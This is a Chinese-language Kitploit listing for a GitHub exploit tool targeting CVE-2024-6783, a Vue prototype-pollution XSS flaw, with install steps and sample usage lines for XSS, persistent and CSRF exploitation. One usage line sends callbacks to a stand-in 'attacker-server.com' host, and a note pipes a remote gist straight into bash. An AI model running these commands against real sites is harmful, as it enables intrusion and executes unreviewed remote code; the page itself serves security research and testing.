Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2024-6783 — CVE-2024-6783 - Vue CVE | Kitploit
工具/GitHubGitHub/horkimhab/cve-2024-6783
漏洞分析CTF学习与教育精选资源学习路径与课程实验室与实践
GitHubhorkimhab/cve-2024-6783

CVE-2024-6783

CVE-2024-6783 - Vue CVE

查看仓库
122个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
网站
分享

CVE-2024-6783 - Vue CVE

在 Vue 中发现了一个漏洞,该漏洞允许攻击者通过原型污染(prototype pollution)执行 XSS 攻击。攻击者可以修改某些属性的原型链,例如 Object.prototype.staticClass 或 Object.prototype.staticStyle,从而执行任意 JavaScript 代码。

捐赠

通过 PayPal 或扫描下方二维码来支持本项目的维护。

paypal

QR code for donation

⚡ 简单用法

请仅在安全且已获授权的环境中使用本项目,例如:

  • 本地虚拟机
  • Docker 容器
  • 隔离的实验室环境
  • 已获授权的渗透测试环境

示例配置:

git clone https://github.com/HORKimhab/CVE-2024-6783
cd CVE-2024-6783

# 项目使用 Python,请按以下步骤操作

# 创建虚拟环境
python -m venv venv

# 激活虚拟环境

# macOS / Linux
source venv/bin/activate

# Windows (Git Bash / WSL)
source venv/Scripts/activate

# 安装依赖
pip install -r requirements.txt

示例用法:

# 仅扫描
python cve-2024-6783.py -u https://example.com -v

# 扫描并执行 XSS 漏洞利用
python cve-2024-6783.py -u https://example.com -e xss

# 带回调的 XSS 漏洞利用
python cve-2024-6783.py -u https://example.com -e xss -c http://attacker-server.com/callback

# 自动回调服务器
python cve-2024-6783.py -u https://example.com -e persistent -c auto

# CSRF 漏洞利用
python cve-2024-6783.py -u https://example.com -e csrf

# 完整扫描与漏洞利用(含详细输出)
python cve-2024-6783.py -u https://example.com -e xss -c auto -v -o evidence.html

注意:

  • 从其他项目克隆时,你必须运行 curl -fsSL https://gist.githubusercontent.com/HORKimhab/24c89ee9a86a42aac88381334f8bfe48/raw | bash -s -- -y 来清除嵌套目录中的 .git
  • 例如:cve-2025-46822.sh、cve-2025-46822-lab.sh、...

鸣谢或参考

  • https://www.herodevs.com/vulnerability-directory/cve-2024-6783?nes-for-vue-2
  • vue-template-compiler-patched-bio: https://github.com/bio/vue-template-compiler-patched

📚 教育性安全研究仓库

一个用于在受控环境中学习、测试和研究网络安全概念的仓库。


⚠️ 安全与法律免责声明

目的

本仓库仅用于教育和已获授权的安全研究。

其设计目的是帮助用户了解:

  • 安全漏洞
  • 沙箱与隔离概念
  • 安全编码与防御实践

仅限授权使用

请仅在您拥有许可的环境中使用本仓库,例如:

  • 个人实验室或虚拟机
  • Docker 或隔离环境
  • 已获授权的渗透测试
  • 网络安全培训或学术研究

严禁未经授权或非法使用。


免责条款

作者和贡献者不对因本项目造成的任何损害、滥用、法律问题或损失负责。

使用本仓库即表示您同意:

  • 您对自己的行为负责
  • 您将合法且合乎道德地使用它
  • 本项目按无担保方式提供

合乎道德的使用

本项目旨在用于:

  • 防御性安全研究
  • 网络安全教育
  • 漏洞意识提升
  • 安全系统与软件研究

请遵循负责任披露实践,并遵守所有适用法律。


联系方式

如需负责任披露或合作,请通过 GitHub 联系仓库维护者。

下载工具